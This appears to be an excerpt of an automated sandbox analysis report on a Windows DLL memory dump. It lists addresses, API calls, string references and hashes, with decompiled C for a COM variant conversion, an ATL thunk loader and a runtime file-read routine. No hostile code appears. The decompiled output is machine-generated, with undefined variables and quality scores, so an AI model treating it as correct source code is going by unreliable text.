0x6e7dbc7e
0x6e7dbc7f
0x6e7dbc80
0x6e7dbc81
0x6e7dbc83
0x6e7dbc86
0x6e7dbc89
0x6e7dbc8c
0x6e7dbc8d
0x6e7dbc8e
0x6e7dbc8f
0x6e7dbc91
0x6e7dbc94
0x6e7dbc97
0x6e7dbc9a
0x6e7dbc9d
0x6e7dbc9f
0x6e7dbccc
0x6e7dbcd1
0x6e7dbdbf
0x6e7dbdbf
0x6e7dbdc4
0x6e7dbdc5
0x6e7dbdc6
0x6e7dbdc7
0x6e7dbdc8
0x6e7dbdc9
0x6e7dbdca
0x6e7dbdcb
0x6e7dbdcc
0x6e7dbdcd
0x6e7dbdce
0x6e7dbdcf
0x6e7dbdd0
0x6e7dbdd1
0x6e7dbdd3
0x6e7dbdd6
0x6e7dbdd7
0x6e7dbdda
0x6e7dbddb
0x6e7dbdde
0x6e7dbddf
0x6e7dbde1
0x6e7dbded
0x6e7dbdf0
0x6e7dbdf3
0x6e7dbdf6
0x6e7dbdf8
0x6e7dbefb
0x6e7dbefc
0x6e7dbefe
0x6e7dbf2b
0x6e7dbf30
0x6e7dbf38
0x6e7dbf41
0x6e7dbf00
0x6e7dbf03
0x6e7dbf08
0x6e7dbf0e
0x6e7dbf0e
0x6e7dbf11
0x6e7dbf13
0x6e7dbf15
0x6e7dbf17
0x6e7dbf1a
0x6e7dbf1a
0x6e7dbf1a
0x00000000
0x6e7dbf11
0x6e7dbdfe
0x6e7dbdfe
0x6e7dbe04
0x6e7dbf49
0x6e7dbf49
0x6e7dbf4e
0x6e7dbf4f
0x6e7dbf50
0x6e7dbf51
0x6e7dbf53
0x6e7dbf54
0x6e7dbf5a
0x6e7dbf5f
0x6e7dbf62
0x6e7dbf65
0x6e7dbf95
0x6e7dbf95
0x6e7dbf97
0x6e7dbf9e
0x6e7dbfa0
0x6e7dbfa8
0x6e7dbfb6
0x6e7dbf67
0x6e7dbf67
0x6e7dbf6a
0x6e7dbf71
0x6e7dbf77
0x6e7dbf8b
0x6e7dbf8b
0x6e7dbf8d
0x6e7dbf92
0x00000000
0x6e7dbf79
0x6e7dbf79
0x6e7dbf7c
0x6e7dbf84
0x6e7dbf87
0x6e7dbfb9
0x6e7dbfbe
0x6e7dbfbf
0x6e7dbfc0
0x6e7dbfd3
0x6e7dbf89
0x6e7dbf89
0x00000000
0x6e7dbf89
0x6e7dbf87
0x6e7dbf77
0x6e7dbe0a
0x6e7dbe0e
0x6e7dbe19
0x6e7dbe1b
0x6e7dbe25
0x6e7dbe27
0x6e7dbe29
0x6e7dbe2c
0x6e7dbe1d
0x6e7dbe1d
0x6e7dbe1d
0x6e7dbe2f
0x6e7dbe31
0x6e7dbe62
0x6e7dbe62
0x6e7dbe65
0x6e7dbe6b
0x6e7dbe72
0x6e7dbe79
0x6e7dbe7b
0x6e7dbedd
0x6e7dbedd
0x6e7dbedf
0x6e7dbee1
0x6e7dbf1f
0x6e7dbf1f
0x6e7dbf28
0x6e7dbee3
0x6e7dbee3
0x6e7dbee3
0x6e7dbee5
0x6e7dbee7
0x6e7dbeea
0x6e7dbeea
0x6e7dbeea
0x6e7dbeef
0x6e7dbef8
0x6e7dbef8
0x6e7dbe7d
0x6e7dbe7d
0x6e7dbe82
0x00000000
0x6e7dbe88
0x6e7dbe88
0x6e7dbe8b
0x6e7dbe8e
0x6e7dbe93
0x6e7dbebf
0x6e7dbec1
0x6e7dbece
0x6e7dbece
0x6e7dbec3
0x6e7dbec3
0x6e7dbec4
0x6e7dbec9
0x00000000
0x6e7dbe95
0x6e7dbe95
0x6e7dbe9b
0x6e7dbe9e
0x6e7dbea1
0x6e7dbea7
0x6e7dbea9
0x6e7dbeac
0x6e7dbeae
0x00000000
0x6e7dbeb4
0x6e7dbeb4
0x6e7dbeb7
0x6e7dbeba
0x6e7dbed0
0x6e7dbed0
0x6e7dbed2
0x6e7dbed7
0x6e7dbed7
0x6e7dbeda
0x00000000
0x6e7dbeda
0x6e7dbeae
0x6e7dbe93
0x6e7dbe82
0x6e7dbe33
0x6e7dbe33
0x6e7dbe36
0x6e7dbe3c
0x6e7dbe58
0x6e7dbe58
0x6e7dbe5a
0x6e7dbe5f
0x00000000
0x6e7dbe3e
0x6e7dbe3e
0x6e7dbe41
0x6e7dbe44
0x6e7dbe46
0x6e7dbe4c
0x6e7dbe4f
0x6e7dbf44
0x6e7dbf44
0x00000000
0x6e7dbe55
0x6e7dbe55
0x00000000
0x6e7dbe55
0x6e7dbe4f
0x6e7dbe3c
0x6e7dbe31
0x6e7dbe04
0x6e7dbcd7
0x6e7dbcd9
0x6e7dbcdc
0x6e7dbce2
0x6e7dbcf2
0x6e7dbcf6
0x6e7dbcf8
0x6e7dbd01
0x6e7dbd04
0x6e7dbd06
0x6e7dbcfa
0x6e7dbcfa
0x6e7dbcfa
0x6e7dbce4
0x6e7dbce4
0x6e7dbce4
0x6e7dbd09
0x6e7dbd09
0x6e7dbd0c
0x6e7dbd0f
0x6e7dbd14
0x6e7dbd1b
0x6e7dbd21
0x6e7dbd46
0x6e7dbd48
0x6e7dbd57
0x6e7dbd57
0x6e7dbd4a
0x6e7dbd4a
0x6e7dbd4b
0x6e7dbd50
0x6e7dbd53
0x6e7dbd53
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7dbd16
0x6e7dbd16
0x6e7dbd23
0x6e7dbd23
0x6e7dbd26
0x6e7dbd29
0x6e7dbd2b
0x6e7dbd2e
0x6e7dbd2f
0x6e7dbd34
0x6e7dbd37
0x6e7dbd39
0x6e7dbdba
0x6e7dbdba
0x00000000
0x6e7dbd3b
0x6e7dbd3b
0x6e7dbd3e
0x6e7dbd41
0x6e7dbd59
0x6e7dbd59
0x6e7dbd5c
0x6e7dbd5f
0x6e7dbd62
0x6e7dbd6a
0x6e7dbd71
0x6e7dbd74
0x6e7dbd78
0x6e7dbd7b
0x6e7dbd7e
0x6e7dbdad
0x6e7dbdad
0x6e7dbdb7
0x6e7dbd80
0x6e7dbd80
0x6e7dbd87
0x6e7dbd89
0x6e7dbd8f
0x6e7dbda3
0x6e7dbda3
0x6e7dbda5
0x00000000
0x6e7dbd91
0x6e7dbd91
0x6e7dbd94
0x6e7dbd9c
0x6e7dbd9f
0x00000000
0x6e7dbda1
0x6e7dbda1
0x00000000
0x6e7dbda1
0x6e7dbd9f
0x6e7dbd8f
0x6e7dbd7e
0x6e7dbd39
0x6e7dbd14
0x6e7dbca1
0x6e7dbca1
0x6e7dbca3
0x6e7dbca6
0x6e7dbca8
0x6e7dbca8
0x6e7dbcaa
0x6e7dbcad
0x6e7dbcb3
0x6e7dbcbb
0x6e7dbcbd
0x6e7dbcc9
0x6e7dbcc9
0x6e7dbc53
0x6e7dbc53
0x00000000
0x6e7dbc53
0x6e7dbc51
0x6e7dbc41
0x6e7dbbd4
0x6e7dbbd4
0x00000000
0x6e7dbbd4
0x6e7dbbd2
0x6e7dbbc2
0x6e7d9042
0x6e7d904f
0x6e7d9055
0x6e7d9057
0x6e7d91a7
0x6e7d91a8
0x00000000
0x6e7d905d
0x6e7d905d
0x6e7d905f
0x00000000
0x6e7d9065
0x6e7d9070
0x6e7d9077
0x6e7d907d
0x6e7d907f
0x6e7d9081
0x6e7d9084
0x6e7d9086
0x6e7d9089
0x6e7d9090
0x6e7d9097
0x6e7d909c
0x6e7d909e
0x6e7d90a0
0x6e7d90a3
0x6e7d90a6
0x6e7d90c6
0x6e7d90a8
0x6e7d90ab
0x6e7d90b4
0x6e7d90b9
0x6e7d90b9
0x6e7d90a6
0x6e7d90cb
0x6e7d90ce
0x6e7d90ce
0x6e7d90d3
0x6e7d90da
0x6e7d90de
0x6e7d90e1
0x6e7d90e3
0x00000000
0x6e7d90e9
0x6e7d90e9
0x6e7d90ee
0x6e7d90f4
0x6e7d90fb
0x6e7d90fe
0x6e7d9100
0x6e7d9180
0x6e7d9184
0x6e7d9187
0x6e7d9189
0x6e7d918e
0x6e7d918e
0x00000000
0x6e7d9102
0x6e7d9102
0x6e7d9105
0x6e7d9108
0x6e7d910a
0x6e7d910c
0x6e7d910f
0x6e7d9113
0x6e7d9115
0x6e7d9117
0x6e7d911a
0x6e7d911d
0x6e7d911d
0x6e7d9120
0x6e7d9124
0x6e7d9126
0x6e7d912b
0x6e7d912e
0x6e7d912e
0x6e7d9126
0x6e7d9131
0x6e7d9135
0x6e7d9137
0x6e7d9139
0x6e7d913c
0x6e7d913c
0x6e7d9142
0x6e7d9144
0x6e7d9147
0x6e7d9149
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7d9149
0x6e7d9100
0x6e7d90e3
0x6e7d905f
0x6e7d9057
0x6e7d903c
0x00000000
0x6e7d900f
0x00000000
0x6e7d8ff0
0x6e7d8fdf
0x6e7d8f0d
0x6e7d8f0d
0x00000000
0x6e7d8f0d
0x6e7d8f0b
0x6e7d8efb
0x00000000
0x00000000
0x00000000
0x6e7d8d82
0x6e7d8d72
0x6e7d8d5e
0x6e7d8cce
0x6e7d8caf
0x6e7d8ca7
0x6e7d8c8c
0x00000000
0x6e7d8c5f
0x00000000
0x6e7d8c40
0x6e7d8c30
0x6e7d8a8c
0x6e7d8a93
0x6e7d8a96
0x6e7d8a98
0x00000000
0x6e7d8a9e
0x6e7d8aaa
0x6e7d8aae
0x6e7d8ab2
0x6e7d8ab7
0x6e7d8abb
0x6e7d8abd
0x6e7d8abf
0x6e7d8ac5
0x6e7d8ac5
0x6e7d8ac1
0x6e7d8ac1
0x6e7d8ac1
0x6e7d8ac7
0x6e7d8ac9
0x6e7d8ad0
0x6e7d8ad0
0x6e7d8ad3
0x6e7d8ad6
0x6e7d8ad6
0x6e7d8adf
0x6e7d8ae3
0x6e7d8ae7
0x6e7d8aec
0x6e7d8aef
0x6e7d8af1
0x6e7d8af3
0x6e7d8af8
0x6e7d8af9
0x6e7d8afb
0x6e7d8afd
0x6e7d8aff
0x6e7d8b01
0x6e7d8b03
0x6e7d8b06
0x6e7d8b0c
0x6e7d8b0c
0x6e7d8b12
0x6e7d8b15
0x6e7d8b17
0x6e7d8b1a
0x6e7d8b1f
0x6e7d8b22
0x6e7d8b22
0x6e7d8b29
0x6e7d8b2c
0x6e7d8b31
0x6e7d8afd
0x6e7d8b34
0x6e7d8b34
0x6e7d8b3f
0x6e7d8b45
0x6e7d8b4b
0x6e7d8b4b
0x6e7d8b4f
0x6e7d8b52
0x6e7d8b54
0x6e7d8b59
0x6e7d8b59
0x00000000
0x6e7d8b54
0x6e7d8a86
0x6e7d8a7b
0x6e7d89dd
0x6e7d8933
0x6e7d8913
0x6e7d8901
0x6e7d88f6
0x6e7d884f
0x6e7d8b5c
0x6e7d8b5c
0x6e7d8b63
0x6e7d8b66
0x6e7d8b68
0x6e7d8b6d
0x6e7d8b6d
0x6e7d8b75
0x6e7d8b83
0x6e7d8b8d
0x6e7d8b8d
0x6e7d884d
0x00000000
0x00000000
0x00000000
0x6e7d878d
0x6e7d8792
0x6e7d8796
0x6e7d87ab
0x6e7d87b0
0x6e7d87b9
0x00000000
0x00000000
0x00000000
0x00000000
0x6e7d8796
0x6e7d876b
0x6e7d876e
0x6e7d87bf
0x6e7d87c4
0x6e7d87db
0x6e7d87db
0x00000000

APIs

VariantInit.OLEAUT32(?), ref: 6E7D8779
VariantChangeType.OLEAUT32(?,?,00000000,00000008), ref: 6E7D87A1
VariantClear.OLEAUT32(?), ref: 6E7D87B9

Part of subcall function 6E7D84A0: SysFreeString.OLEAUT32(?), ref: 6E7D84FE
Part of subcall function 6E7D84A0: SysAllocString.OLEAUT32(?), ref: 6E7D8569

_com_issue_error.COMSUPP ref: 6E7D87DF

Strings

name, xrefs: 6E7D8878
value, xrefs: 6E7D8A00
page, xrefs: 6E7D901B, 6E7D9046
counter, xrefs: 6E7D8C6B, 6E7D8C96

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: Variant$String$AllocChangeClearFreeInitType_com_issue_error
String ID: counter$name$page$value
API String ID: 2722580932-1733285648
Opcode ID: d9d01c84cdfa9385aa7c6a67f30b7c562d18b8d85459f4940855436544c84432
Instruction ID: 66bbaa9dbc21ea680411f9d1881f5eb764927bbce983aafa4e101b9d7eb8fbc5
Opcode Fuzzy Hash: d9d01c84cdfa9385aa7c6a67f30b7c562d18b8d85459f4940855436544c84432
Instruction Fuzzy Hash: BD119371A04509ABDB10DFE4CA49BDEB7FCFB09724F10456AE805E7650E735A909CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E7E7958, Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 58
libraryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E6E7E7958(void* __ecx, intOrPtr* _a4) {
				void* _v8;
				struct HINSTANCE__* _t4;
				intOrPtr* _t5;
				intOrPtr* _t11;

				if( *0x6e81fd14 == 0) {
					_t4 = LoadLibraryExA("atlthunk.dll", 0, 0x800);
					_t15 = _t4;
					if(_t4 == 0 || E6E7E7A08(_t15, "AtlThunk_AllocateData", 0x6e81fd04) == 0 || E6E7E7A08(_t15, "AtlThunk_InitData", 0x6e81fd08) == 0 || E6E7E7A08(_t15, "AtlThunk_DataToCode", 0x6e81fd0c) == 0 || E6E7E7A08(_t15, "AtlThunk_FreeData", 0x6e81fd10) == 0) {
						_t5 = 0;
					} else {
						asm("lock or [eax], ecx");
						_t5 = _a4;
						 *0x6e81fd14 = 1;
						__imp__DecodePointer( *_t5);
					}
					return _t5;
				} else {
					_t11 = _a4;
					__imp__DecodePointer( *_t11);
					return _t11;
				}
			}

0x6e7e7963
0x6e7e797f
0x6e7e7985
0x6e7e7989
0x6e7e7a03
0x6e7e79e7
0x6e7e79ec
0x6e7e79ef
0x6e7e79f2
0x6e7e79fb
0x6e7e79fb
0x6e7e7a07
0x6e7e7965
0x6e7e7965
0x6e7e796a
0x6e7e7971
0x6e7e7971

APIs

DecodePointer.KERNEL32(?,?,?,6E7E7C9D,6E81FD10,C000008C,?,?,6E7E26EC,?,77DCEE0D,00000000,00000000,6E808FA0,000000FF), ref: 6E7E796A
LoadLibraryExA.KERNEL32(atlthunk.dll,00000000,00000800,?,?,?,6E7E7C9D,6E81FD10,C000008C,?,?,6E7E26EC,?,77DCEE0D,00000000,00000000), ref: 6E7E797F
DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,000000FF), ref: 6E7E79FB

Strings

AtlThunk_DataToCode, xrefs: 6E7E79BE
AtlThunk_InitData, xrefs: 6E7E79A7
AtlThunk_FreeData, xrefs: 6E7E79D5
AtlThunk_AllocateData, xrefs: 6E7E7990
atlthunk.dll, xrefs: 6E7E797A

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.998889318.000000006E821000.00000002.00020000.sdmp Download File

Similarity

API ID: DecodePointer$LibraryLoad
String ID: AtlThunk_AllocateData$AtlThunk_DataToCode$AtlThunk_FreeData$AtlThunk_InitData$atlthunk.dll
API String ID: 1423960858-1745123996
Opcode ID: 87b5df66f10c0e23bf95058ac9ba6877defff43ba599417ad47901dc90c74766
Instruction ID: 1216d9ba4d6602e399eeda4cb613d78196305ad1642de0b19f6908aeefbf91c9
Opcode Fuzzy Hash: 87b5df66f10c0e23bf95058ac9ba6877defff43ba599417ad47901dc90c74766
Instruction Fuzzy Hash: C801AD714046426BCF03DAB8AE05BDA3B555F1324EF100864F8087A7E3DB92A304CAD9

Uniqueness

Uniqueness Score: -1.00%

Function 6E800961, Relevance: 13.8, APIs: 9, Instructions: 300
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6E800961(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				char _v6;
				void* _v12;
				unsigned int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _v32;
				long _v36;
				void* _v40;
				long _v44;
				signed int* _t143;
				signed int _t145;
				intOrPtr _t149;
				signed int _t153;
				signed int _t155;
				signed char _t157;
				unsigned int _t158;
				intOrPtr _t162;
				void* _t163;
				signed int _t164;
				signed int _t167;
				long _t168;
				intOrPtr _t175;
				signed int _t176;
				intOrPtr _t178;
				signed int _t180;
				signed int _t184;
				char _t191;
				char* _t192;
				char _t199;
				char* _t200;
				signed char _t211;
				signed int _t213;
				long _t215;
				signed int _t216;
				char _t218;
				signed char _t222;
				signed int _t223;
				unsigned int _t224;
				intOrPtr _t225;
				unsigned int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed char _t236;
				signed int _t237;
				signed int _t239;
				signed int _t240;
				signed int _t241;
				signed int _t242;
				signed int _t246;
				void* _t248;
				void* _t249;

				_t213 = _a4;
				if(_t213 != 0xfffffffe) {
					__eflags = _t213;
					if(_t213 < 0) {
						L58:
						_t143 = E6E7F5AE5();
						 *_t143 =  *_t143 & 0x00000000;
						__eflags =  *_t143;
						 *((intOrPtr*)(E6E7F5AF8())) = 9;
						L59:
						_t145 = E6E7EE5D6();
						goto L60;
					}
					__eflags = _t213 -  *0x6e820288; // 0x40
					if(__eflags >= 0) {
						goto L58;
					}
					_v24 = 1;
					_t239 = _t213 >> 6;
					_t235 = (_t213 & 0x0000003f) * 0x30;
					_v20 = _t239;
					_t149 =  *((intOrPtr*)(0x6e820088 + _t239 * 4));
					_v28 = _t235;
					_t222 =  *((intOrPtr*)(_t235 + _t149 + 0x28));
					_v5 = _t222;
					__eflags = _t222 & 0x00000001;
					if((_t222 & 0x00000001) == 0) {
						goto L58;
					}
					_t223 = _a12;
					__eflags = _t223 - 0x7fffffff;
					if(_t223 <= 0x7fffffff) {
						__eflags = _t223;
						if(_t223 == 0) {
							L57:
							return 0;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L57;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t153 =  *((intOrPtr*)(_t235 + _t149 + 0x29));
						_v5 = _t153;
						_v32 =  *((intOrPtr*)(_t235 + _t149 + 0x18));
						_t246 = 0;
						_t155 = _t153 - 1;
						__eflags = _t155;
						if(_t155 == 0) {
							_t236 = _v24;
							_t157 =  !_t223;
							__eflags = _t236 & _t157;
							if((_t236 & _t157) != 0) {
								_t158 = 4;
								_t224 = _t223 >> 1;
								_v16 = _t158;
								__eflags = _t224 - _t158;
								if(_t224 >= _t158) {
									_t158 = _t224;
									_v16 = _t224;
								}
								_t246 = E6E7F92A2(_t224, _t158);
								E6E7F9268(0);
								E6E7F9268(0);
								_t249 = _t248 + 0xc;
								_v12 = _t246;
								__eflags = _t246;
								if(_t246 != 0) {
									_t162 = E6E800EB4(_t213, 0, 0, _v24);
									_t225 =  *((intOrPtr*)(0x6e820088 + _t239 * 4));
									_t248 = _t249 + 0x10;
									_t240 = _v28;
									 *((intOrPtr*)(_t240 + _t225 + 0x20)) = _t162;
									_t163 = _t246;
									 *(_t240 + _t225 + 0x24) = _t236;
									_t235 = _t240;
									_t223 = _v16;
									L21:
									_t241 = 0;
									_v40 = _t163;
									_t215 =  *((intOrPtr*)(0x6e820088 + _v20 * 4));
									_v36 = _t215;
									__eflags =  *(_t235 + _t215 + 0x28) & 0x00000048;
									_t216 = _a4;
									if(( *(_t235 + _t215 + 0x28) & 0x00000048) != 0) {
										_t218 =  *((intOrPtr*)(_t235 + _v36 + 0x2a));
										_v6 = _t218;
										__eflags = _t218 - 0xa;
										_t216 = _a4;
										if(_t218 != 0xa) {
											__eflags = _t223;
											if(_t223 != 0) {
												_t241 = _v24;
												 *_t163 = _v6;
												_t216 = _a4;
												_t232 = _t223 - 1;
												__eflags = _v5;
												_v12 = _t163 + 1;
												_v16 = _t232;
												 *((char*)(_t235 +  *((intOrPtr*)(0x6e820088 + _v20 * 4)) + 0x2a)) = 0xa;
												if(_v5 != 0) {
													_t191 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x6e820088 + _v20 * 4)) + 0x2b));
													_v6 = _t191;
													__eflags = _t191 - 0xa;
													if(_t191 != 0xa) {
														__eflags = _t232;
														if(_t232 != 0) {
															_t192 = _v12;
															_t241 = 2;
															 *_t192 = _v6;
															_t216 = _a4;
															_t233 = _t232 - 1;
															_v12 = _t192 + 1;
															_v16 = _t233;
															 *((char*)(_t235 +  *((intOrPtr*)(0x6e820088 + _v20 * 4)) + 0x2b)) = 0xa;
															__eflags = _v5 - _v24;
															if(_v5 == _v24) {
																_t199 =  *((intOrPtr*)(_t235 +  *((intOrPtr*)(0x6e820088 + _v20 * 4)) + 0x2c));
																_v6 = _t199;
																__eflags = _t199 - 0xa;
																if(_t199 != 0xa) {
																	__eflags = _t233;
																	if(_t233 != 0) {
																		_t200 = _v12;
																		_t241 = 3;
																		 *_t200 = _v6;
																		_t216 = _a4;
																		_t234 = _t233 - 1;
																		__eflags = _t234;
																		_v12 = _t200 + 1;
																		_v16 = _t234;
																		 *((char*)(_t235 +  *((intOrPtr*)(0x6e820088 + _v20 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t164 = E6E803B38(_t216);
									__eflags = _t164;
									if(_t164 == 0) {
										L41:
										_v24 = 0;
										L42:
										_t167 = ReadFile(_v32, _v12, _v16,  &_v36, 0);
										__eflags = _t167;
										if(_t167 == 0) {
											L53:
											_t168 = GetLastError();
											_t241 = 5;
											__eflags = _t168 - _t241;
											if(_t168 != _t241) {
												__eflags = _t168 - 0x6d;
												if(_t168 != 0x6d) {
													L37:
													E6E7F5AC2(_t168);
													goto L38;
												}
												_t242 = 0;
												goto L39;
											}
											 *((intOrPtr*)(E6E7F5AF8())) = 9;
											 *(E6E7F5AE5()) = _t241;
											goto L38;
										}
										_t229 = _a12;
										__eflags = _v36 - _t229;
										if(_v36 > _t229) {
											goto L53;
										}
										_t242 = _t241 + _v36;
										__eflags = _t242;
										L45:
										_t237 = _v28;
										_t175 =  *((intOrPtr*)(0x6e820088 + _v20 * 4));
										__eflags =  *(_t237 + _t175 + 0x28) & 0x00000080;
										if(( *(_t237 + _t175 + 0x28) & 0x00000080) != 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v24;
												_push(_t242 >> 1);
												_push(_v40);
												_push(_t216);
												if(_v24 == 0) {
													_t176 = E6E8004C6();
												} else {
													_t176 = E6E8007CD();
												}
											} else {
												_t230 = _t229 >> 1;
												__eflags = _t229 >> 1;
												_t176 = E6E80067D(_t229 >> 1, _t229 >> 1, _t216, _v12, _t242, _a8, _t230);
											}
											_t242 = _t176;
										}
										goto L39;
									}
									_t231 = _v28;
									_t178 =  *((intOrPtr*)(0x6e820088 + _v20 * 4));
									__eflags =  *(_t231 + _t178 + 0x28) & 0x00000080;
									if(( *(_t231 + _t178 + 0x28) & 0x00000080) == 0) {
										goto L41;
									}
									_t180 = GetConsoleMode(_v32,  &_v44);
									__eflags = _t180;
									if(_t180 == 0) {
										goto L41;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L42;
									}
									_t184 = ReadConsoleW(_v32, _v12, _v16 >> 1,  &_v36, 0);
									__eflags = _t184;
									if(_t184 != 0) {
										_t229 = _a12;
										_t242 = _t241 + _v36 * 2;
										goto L45;
									}
									_t168 = GetLastError();
									goto L37;
								} else {
									 *((intOrPtr*)(E6E7F5AF8())) = 0xc;
									 *(E6E7F5AE5()) = 8;
									L38:
									_t242 = _t241 | 0xffffffff;
									__eflags = _t242;
									L39:
									E6E7F9268(_t246);
									return _t242;
								}
							}
							L15:
							 *(E6E7F5AE5()) =  *_t206 & _t246;
							 *((intOrPtr*)(E6E7F5AF8())) = 0x16;
							E6E7EE5D6();
							goto L38;
						}
						__eflags = _t155 != 1;
						if(_t155 != 1) {
							L13:
							_t163 = _a8;
							_v16 = _t223;
							_v12 = _t163;
							goto L21;
						}
						_t211 =  !_t223;
						__eflags = _t211 & 0x00000001;
						if((_t211 & 0x00000001) == 0) {
							goto L15;
						}
						goto L13;
					}
					L6:
					 *(E6E7F5AE5()) =  *_t151 & 0x00000000;
					 *((intOrPtr*)(E6E7F5AF8())) = 0x16;
					goto L59;
				} else {
					 *(E6E7F5AE5()) =  *_t212 & 0x00000000;
					_t145 = E6E7F5AF8();
					 *_t145 = 9;
					L60:
					return _t145 | 0xffffffff;
				}
			}

0x6e80096a
0x6e800971
0x6e80098b
0x6e80098d
0x6e800cf5
0x6e800cf5
0x6e800cfa
0x6e800cfa
0x6e800d02
0x6e800d08
0x6e800d08
0x00000000
0x6e800d08
0x6e800993
0x6e800999
0x00000000
0x00000000
0x6e8009a1
0x6e8009ad
0x6e8009b0
0x6e8009b3
0x6e8009b6
0x6e8009bd
0x6e8009c0
0x6e8009c4
0x6e8009c7
0x6e8009ca
0x00000000
0x00000000
0x6e8009d0
0x6e8009d3
0x6e8009d9
0x6e8009f3
0x6e8009f5
0x6e800cf1
0x00000000
0x6e800cf1
0x6e8009fb
0x6e8009ff
0x00000000
0x00000000
0x6e800a05
0x6e800a09
0x00000000
0x00000000
0x6e800a10
0x6e800a14
0x6e800a17
0x6e800a1a
0x6e800a1f
0x6e800a1f
0x6e800a22
0x6e800a3f
0x6e800a44
0x6e800a46
0x6e800a48
0x6e800a68
0x6e800a69
0x6e800a6b
0x6e800a6e
0x6e800a70
0x6e800a72
0x6e800a74
0x6e800a74
0x6e800a7f
0x6e800a81
0x6e800a88
0x6e800a8d
0x6e800a90
0x6e800a93
0x6e800a95
0x6e800aba
0x6e800abf
0x6e800ac6
0x6e800ac9
0x6e800acc
0x6e800ad0
0x6e800ad2
0x6e800ad6
0x6e800ad8
0x6e800adb
0x6e800ade
0x6e800ae0
0x6e800ae3
0x6e800aea
0x6e800aed
0x6e800af2
0x6e800af5
0x6e800afe
0x6e800b02
0x6e800b05
0x6e800b08
0x6e800b0b
0x6e800b11
0x6e800b13
0x6e800b1c
0x6e800b1f
0x6e800b22
0x6e800b25
0x6e800b26
0x6e800b2a
0x6e800b30
0x6e800b3a
0x6e800b3f
0x6e800b4f
0x6e800b53
0x6e800b56
0x6e800b58
0x6e800b5a
0x6e800b5c
0x6e800b5e
0x6e800b66
0x6e800b67
0x6e800b6a
0x6e800b6d
0x6e800b6e
0x6e800b74
0x6e800b7e
0x6e800b86
0x6e800b89
0x6e800b95
0x6e800b99
0x6e800b9c
0x6e800b9e
0x6e800ba0
0x6e800ba2
0x6e800ba4
0x6e800bac
0x6e800bad
0x6e800bb0
0x6e800bb3
0x6e800bb3
0x6e800bb4
0x6e800bba
0x6e800bc4
0x6e800bc4
0x6e800ba2
0x6e800b9e
0x6e800b89
0x6e800b5c
0x6e800b58
0x6e800b3f
0x6e800b13
0x6e800b0b
0x6e800bca
0x6e800bd0
0x6e800bd2
0x6e800c45
0x6e800c45
0x6e800c49
0x6e800c59
0x6e800c5f
0x6e800c61
0x6e800cbd
0x6e800cbd
0x6e800cc5
0x6e800cc6
0x6e800cc8
0x6e800ce1
0x6e800ce4
0x6e800c21
0x6e800c22
0x00000000
0x6e800c27
0x6e800cea
0x00000000
0x6e800cea
0x6e800ccf
0x6e800cda
0x00000000
0x6e800cda
0x6e800c63
0x6e800c66
0x6e800c69
0x00000000
0x00000000
0x6e800c6b
0x6e800c6b
0x6e800c6e
0x6e800c71
0x6e800c74
0x6e800c7b
0x6e800c80
0x6e800c82
0x6e800c86
0x6e800ca1
0x6e800ca5
0x6e800ca6
0x6e800ca9
0x6e800caa
0x6e800cb6
0x6e800cac
0x6e800cac
0x6e800cac
0x6e800c88
0x6e800c88
0x6e800c88
0x6e800c93
0x6e800c98
0x6e800c9b
0x6e800c9b
0x00000000
0x6e800c80
0x6e800bd7
0x6e800bda
0x6e800be1
0x6e800be6
0x00000000
0x00000000
0x6e800bef
0x6e800bf5
0x6e800bf7
0x00000000
0x00000000
0x6e800bf9
0x6e800bfd
0x00000000
0x00000000
0x6e800c11
0x6e800c17
0x6e800c19
0x6e800c3d
0x6e800c40
0x00000000
0x6e800c40
0x6e800c1b
0x00000000
0x6e800a97
0x6e800a9c
0x6e800aa7
0x6e800c28
0x6e800c28
0x6e800c28
0x6e800c2b
0x6e800c2c
0x00000000
0x6e800c34
0x6e800a95
0x6e800a4a
0x6e800a4f
0x6e800a56
0x6e800a5c
0x00000000
0x6e800a5c
0x6e800a24
0x6e800a27
0x6e800a31
0x6e800a31
0x6e800a34
0x6e800a37
0x00000000
0x6e800a37
0x6e800a2b
0x6e800a2d
0x6e800a2f
0x00000000
0x00000000
0x00000000
0x6e800a2f
0x6e8009db
0x6e8009e0
0x6e8009e8
0x00000000
0x6e800973
0x6e800978
0x6e80097b
0x6e800980
0x6e800d0d
0x00000000
0x6e800d0d

Memory Dump Source

Source File: 00000002.00000002.998800576.000000006E7D1000.00000020.00020000.sdmp, Offset: 6E7D0000, based on PE: true

Associated: 00000002.00000002.998796126.000000006E7D0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998846427.000000006E80A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.998866776.000000006E81E000.00000004.00020000.sdmp Download File
